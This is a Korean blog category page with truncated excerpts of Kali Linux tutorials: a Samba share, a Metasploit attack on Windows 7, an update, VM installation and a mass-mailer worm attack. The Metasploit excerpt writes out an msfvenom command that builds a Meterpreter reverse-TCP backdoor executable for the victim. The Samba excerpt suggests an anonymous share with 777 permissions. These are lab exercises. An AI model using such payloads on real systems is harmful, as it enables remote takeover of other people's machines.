반응형

보안/KaliLinux 49

칼리 리눅스 samba(삼바) 서버 구축하기

가상 머신에 여러 가지 리눅스와 윈도우를 사용하시다 보면 파일을 여기저기로 옮기시는 경우가 많으실 겁니다. 기존의 vmware 공유 설정을 사용하셔도 되지만 삼바 같은 공유폴더 서버를 구축해서 사용해보시면 어떨까요?? 삼바는 리눅스, 윈도우 등 파일 공유가 가능하기 때문에 리눅스 1개에 서버를 구축해두면 같은 아이피 대역 때의 OS들이 접근이 가능합니다. 먼저 삼바 패키지를 설치를 해주는데 보통 내장되어 있습니다. 혹시 패키지가 없으신 분들은 패키지 설치를 해주세요. 공유폴더로 사용할 삼바 디렉터리를 생성 후 허가권을 전부 넣어서 777로 변경하겠습니다. 최상위 위치에 디렉터리를 만들어주세요. 설정 파일 하단에 아래와 같이 익명 설정을 추가해줍니다. 익명을 허가해주면 보안에 별로 안 좋지만 저는 내부 네..

보안/KaliLinux 2022.02.20

칼리 리눅스 메타스플로잇을 활용하여 윈도우 7 해킹

vmware 16.2 ver kali 2022.1 [IP] NAT windows 7 [IP] NAT 같은 대역 아이피 사용 **해당 실습을 통해 실서버 다른 사람에게 공격할시 모든 책임은 당사자에게 있습니다.** 테스트는 보인 PC에서 부탁드립니다. 실습 전 자세한 설명은 옵션 -h 등으로 찾아보시면 자세한 설명들이 나와 있습니다. 공격전 자신의 칼리 리눅스 아이피를 먼저 확인을 해주시면 됩니다. 백도어를 생성 -p 사용할 페이로드 생성 -f 포맷 형식 -o 페이로드를 파일에 저장 Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST= -f exe -o payload.exe 공유 폴더 등으로 생성된 백도어 exe파일을 windows 7에..

보안/KaliLinux 2022.02.20

칼리 리눅스 2022.1 새해 첫 버전 변경 사항

새로운 해의 첫 번째 버전을 먼저 업데이트를 하겠습니다. 제가 사용하는 버전은 2021.4 버전입니다. 새로운 릴리즈 버전을 보면 비주얼 적으로 많은 업데이트가 있었습니다. 2022.1 ver 업데이트하기 업데이트 전에 먼저 아래의 사진처럼 sources.list가 설정되어 있는지 확인해주세요. 혹시 추가 안되어 있으신 분들은 deb http://http.kali.org/kali kali-rolling main contrib non-free 추가해주세요. #vi /etc/apt/sources.list 소스 리스트 추가를 하셨으면 본격적으로 업데이트하겠습니다. #apt-get update #apt-get full-upgrade -y 이렇게 최신 버전으로 업데이트가 완료되었습니다. 업데이트 이후 재부팅! ┌..

보안/KaliLinux 2022.02.20

칼리 리눅스 가상머신에 설치하는 방법

vmware 가상 머신에 kali linux 설치 안녕하세요. 이번에는 vmwre에 칼리 리눅스를 설치를 해보겠습니다. 오류나 안되는 것들은 댓글 주시면 답변드리겠습니다. 커스텀으로 하셔도 상관없습니다. 이미지는 바로 넣고 진행하겠습니다. 이미지 파일 삽입 Linux 선택 ==> 데미안 8.x 64bit 후에 Next 필수입니다. 현재 2022.1 최신버전은 데비안 11 64나 데비안 10 64로 해주시면 됩니다. 가상 머신에 이름을 지정 가상 머신을 하나의 폴더에 관리하고 싶으시며 single file을 선택 일단 20GB로 설정합니다. 필요하면 추후에 늘리도록 하겠습니다. Customize Hardware 클릭 여기서 메모리를 1GB 혹은 2GB로 설정합니다. 다 설정하셨으면 Close 클릭 가상 머..

보안/KaliLinux 2022.02.19

Kali linux Mass Mailer Attack

실습 환경 공격자 : kali linux 2021.4.ver IP는 각자 선택 사항 희생자 : kali linux 2021.4.ver IP는 각자 선택 사항 네트워크 환경 : NAT ** 본 실습 내용을 가지고 실서버에 공격을 하면 모든 책임은 공격을 진행한 본인에게 있습니다.** mass mailer attack?? = 웜을 이용한 메일 공격 Worm?? = N/W를 타고 자신을 복제하는 악성코드 실습 전 apt-get update && apt-get upgrade 위의 과정이 귀찮으시면 setoolit 삭제 후 재설치하시면 됩니다. 2가지 방법이 있는데 저는 첫 번째 방법으로 했습니다. 공격자 pc에 sendmail 패키지를 설치 #apt-get install -y sendmail-bin sendma..

보안/KaliLinux 2022.02.18
반응형